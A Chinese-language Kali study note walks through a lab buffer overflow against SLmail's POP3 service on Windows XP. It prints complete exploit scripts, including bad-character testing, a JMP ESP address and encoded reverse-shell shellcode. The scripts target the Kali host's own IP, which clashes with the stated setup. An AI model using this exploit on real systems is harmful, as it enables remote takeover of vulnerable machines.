Kali學習筆記22:緩衝區溢位漏洞利用實驗
實驗機器:
Kali虛擬機器一臺(192.168.163.133)
Windows XP虛擬機器一臺(192.168.163.130)
如何用Kali虛擬機器一步一步“黑掉”這個windowsXP虛擬機器呢?
用到的軟體:
SLmail程式(存在緩衝區溢位漏洞)
ImmunityDebugger(除錯工具)
mona指令碼(配合除錯工具使用)
這些在準備工作的文章中有百度網盤下載地址
實驗目的:
用Kali虛擬機發送指令碼,完成對SLmail程式的緩衝區溢位漏洞的利用
從而獲取目標windows機器的最高許可權
粗俗來說:黑了這個windows機器
緩衝區溢位漏洞的概念以及實驗準備:
緩衝區溢位實驗(漏洞發現):
接著上篇文章:
上次以及精確定位到EIP在2606位置
那麼是否可以修改ESP暫存器呢?
如何確認ESP暫存器的大小呢?
寫一個小指令碼:
#!/usr/bin/python import socket buffer = 'A' * 2606 + 'B' * 4 + 'C' * (3500 - 2606 - 4) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: print "\nSending evil buffer...\n" s.connect(('192.168.163.133', 110)) data1= s.recv(1024) s.send('USER test' + '\r\n') data2 = s.recv(1024) s.send('PASS ' + buffer + '\r\n') s.close() print '\nDone' except: print 'Can not connect to POP3'
OK,隔了一段時間,先確認下有限伺服器是否有問題:
沒有問題,開啟除錯工具,attach到SLmail,可以嘗試指令碼:
看看除錯工具:
EIP被精確地塞滿B,ESP被塞滿C
選中ESP右鍵Follow in dump:
再右鍵Hex選擇ascii 16bytes格式顯示:
觀察C地起始位置和結束位置:
就我這裡而言:起始地址0212A158,終止地址:0212A2F8
計算:
開啟科學計算器,16進位制計算,2F8-158,得到結果1A0
轉換成10進位制是416
思路:
通常使用的shellcode至少需要300位元組左右
這裡416個位元組是足夠的
如果我ESP這裡上傳一個shellcode,通過修改EIP的地址
讓程式跳轉到ESP暫存器,提取Shellcode程式碼執行
接下來就可以獲取目標機器的最高許可權
接下來我們具體實現:
其實思路看似很簡單,但是這之中還有一些細節問題必須要解決:
比如:有些字元在緩衝區有特定用途,不可以作為程式碼使用
就像0x00,終止字串拷貝操作,0x0D,表示命令輸入完畢
而這些字元根據協議和程式不同而不同,這些壞字元是不可以出現在緩衝區的
所以,我們需要先解決這些壞字元:確認哪些字元是壞字元
寫一個指令碼來確認:
傳送0x00-0xff一共256個字元,一個一個地確認
想辦法拼湊這些字元:然後傳送
#!/usr/bin/python import socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) badchars = ( "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10" "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30" "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60" "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0" "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0" "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0" "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0" "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0" "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x00") buffer = "A" * 2606 + "B" * 4 + badchars try: print "\nSending evil buffer...\n" s.connect(('192.168.163.133', 110)) data1 = s.recv(1024) s.send('USER test' + '\r\n') data2 = s.recv(1024) s.send('PASS ' + buffer + '\r\n') s.close() print '\nDone' except: print 'Can not connect to POP3'
OK,我們來試試(如果Slmail服務崩了重啟一下):
傳送過去看看除錯工具:選擇ESP右鍵dump看詳細
仔細觀察:發現01到09都發送過去了,而0A以後出問題了,緩衝區不能接收0A字元
大膽猜測:0A是個壞字元!
OK,那麼我們把腳本里面的0A去掉:
繼續執行指令碼:(注意重啟POP服務)
不錯,發現除了去掉的0A,00和0D(0D被過濾掉了),其他的字元全部都出現了
於是可以總結出:緩衝區的字元不能出現0A,0D,00
接下來就可以做資料的重定向:
把EIP四個位元組改為ESP的地址,理論上CPU在EIP提取地址讀取然後執行
看似很簡單,其實還有很多的細節要處理
比如:ESP的地址是變化的,不可以硬編碼
因為:Slmail是基於執行緒的應用程式,作業系統給每個執行緒分配一個地址範圍,每個執行緒地址範圍隨機
變通思路:
目標記憶體地址變動時候,在記憶體中尋找一個作業系統自帶的模組,而且這個模組的地址是固定的
找個一個不變的記憶體地址,呼叫系統模組的JMP,ESP指令的地址,再由該指令間接跳轉
即:把Slmail的EIP暫存器放入上邊說到的這個固定模組的JMP,ESP指令的地址,CPU讀取JMP,ESP記憶體地址,進而跳到shellcode
形象來說:就是某男想要追女神,但不知道她的微信,但某男認識她的閨蜜,這樣一來就可以得到女神微信了(可能不合適,大概理解下)
接下來呢?
如何知道哪個系統模組的地址是固定的呢?
這裡就需要用到準備工作裡面的mona.py指令碼(把指令碼放在除錯工具目錄裡面)
左下角輸入!mona modules查詢所有系統模組:
關注rebase這一欄:重啟記憶體地址是否變化,我們必須找false的
ASLR和SafeSEH和NSCompat都是保護記憶體的專案
因此,我們要找前四項都是false的
OS dll這一列要選true,不同系統都可以利用的
仔細尋找後,發現:OpenC32.dll可以使用
繼續使用mona查詢下OpenC32.dll裡面是否有JMP,ESP指令可以呼叫:
!mona find -s" " -m module 命令可以查詢
注意查詢命令不可以直接查JMP ESP
這是彙編指令,而記憶體中使用的是二進位制
這裡需要使用Kali系統自帶的一個工具:可以將彙編指令轉換成二進位制
發現轉換成二進位制是FFE4:
搜尋FFE4:
沒找到:
一樣的方法在下面找找:
只有SLMFC.DLL和MFC42LOC.DLL前四項false,最後一項true
分別試下:
終於找到了!哈哈
而且有19條(由於Slmail不含有很記憶體保護機制,所以理論上這19個都可以實現利用)
如果有記憶體保護機制,需要下面這個有R(讀)和E(執行)許可權的(選單欄點選m開啟記憶體地圖)
19條中隨便開啟一個,右鍵dis開頭的選項:
找到了:5F4B41E3地址
接下來就可以使用這個地址
可以地址右鍵memory on access(開啟斷點)後邊測試看
繼續,我們針對這個寫一個指令碼:(注意地址要反過來寫)
#!/usr/bin/python import socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) buffer = "A" * 2606 + "\xe3\x41\x4b\x5f" + "C" * 390 try: print "\nSending evil buffer...\n" s.connect(('192.168.163.133', 110)) data1 = s.recv(1024) s.send('USER test' + '\r\n') data2 = s.recv(1024) s.send('PASS ' + buffer + '\r\n') s.close() print '\nDone' except: print 'Can not connect to POP3'
測試:正確跳轉
接下來就是最後一部了:
把ESP裡面這一堆C修改成Shellcode
那麼shellcode怎麼獲取呢?
利用Kali裡面現成的shellcode:
msfpayload
具體使用:
我的思路是Kali機器開一個埠,讓windows機器自己連過來
這樣可以避免被防火牆遮蔽(雖然現在我把防火牆關了)
讓目標把shell給我。
指定反向連線的IP和埠,針對win32
這裡就生成了一個shellcode
但是這個shellcode不能直接用,因為含有壞字元
所以要去掉壞字元
這裡就要用到另一個工具了:Msfencode
把這些shellcode複製出來,繼續寫一個指令碼:
這裡加了8個\x90是什麼意思呢?
組合語言的\x90意思是不操作
這裡是為了保障組合語言執行的有效性(經驗之談,防止異常)
#!/usr/bin/python import socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) shellcode = ("\x6a\x48\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xab\x9c\x6d" + "\xf8\x83\xeb\xfc\xe2\xf4\x57\xf6\x86\xb5\x43\x65\x92\x07\x54\xfc" + "\xe6\x94\x8f\xb8\xe6\xbd\x97\x17\x11\xfd\xd3\x9d\x82\x73\xe4\x84" + "\xe6\xa7\x8b\x9d\x86\xb1\x20\xa8\xe6\xf9\x45\xad\xad\x61\x07\x18" + "\xad\x8c\xac\x5d\xa7\xf5\xaa\x5e\x86\x0c\x90\xc8\x49\xd0\xde\x79" + "\xe6\xa7\x8f\x9d\x86\x9e\x20\x90\x26\x73\xf4\x80\x6c\x13\xa8\xb0" + "\xe6\x71\xc7\xb8\x71\x99\x68\xad\xb6\x9c\x20\xdf\x5d\x73\xeb\x90" + "\xe6\x88\xb7\x31\xe6\xb8\xa3\xc2\x05\x76\xe5\x92\x81\xa8\x54\x4a" + "\x0b\xab\xcd\xf4\x5e\xca\xc3\xeb\x1e\xca\xf4\xc8\x92\x28\xc3\x57" + "\x80\x04\x90\xcc\x92\x2e\xf4\x15\x88\x9e\x2a\x71\x65\xfa\xfe\xf6" + "\x6f\x07\x7b\xf4\xb4\xf1\x5e\x31\x3a\x07\x7d\xcf\x3e\xab\xf8\xdf" + "\x3e\xbb\xf8\x63\xbd\x90\x6b\x34\xce\x7c\xcd\xf4\x6c\x44\xcd\xcf" + "\xe4\x19\x3e\xf4\x81\x01\x01\xfc\x3a\x07\x7d\xf6\x7d\xa9\xfe\x63" + "\xbd\x9e\xc1\xf8\x0b\x90\xc8\xf1\x07\xa8\xf2\xb5\xa1\x71\x4c\xf6" + "\x29\x71\x49\xad\xad\x0b\x01\x09\xe4\x05\x55\xde\x40\x06\xe9\xb0" + "\xe0\x82\x93\x37\xc6\x53\xc3\xee\x93\x4b\xbd\x63\x18\xd0\x54\x4a" + "\x36\xaf\xf9\xcd\x3c\xa9\xc1\x9d\x3c\xa9\xfe\xcd\x92\x28\xc3\x31" + "\xb4\xfd\x65\xcf\x92\x2e\xc1\x63\x92\xcf\x54\x4c\x05\x1f\xd2\x5a" + "\x14\x07\xde\x98\x92\x2e\x54\xeb\x91\x07\x7b\xf4\x9d\x72\xaf\xc3" + "\x3e\x07\x7d\x63\xbd\xf8") buffer = "A" * 2606 + "\xe3\x41\x4b\x5f" + "\x90" * 8 + shellcode try: print "\nSending evil buffer...\n" s.connect(('192.168.163.133', 110)) data1 = s.recv(1024) s.send('USER test' + '\r\n') data2 = s.recv(1024) s.send('PASS ' + buffer + '\r\n') s.close() print '\nDone' except: print 'Can not connect to POP3'
傳送過去!
理想情況:如果指令碼執行成功,會反彈回連444埠
所以我先偵聽kali的444埠:
成功!我們可以操作windows系統了!
OK!拿下了windowsxp系統(亂碼小問題,不用在意)
成功黑掉了windowsxp機器,哈哈哈
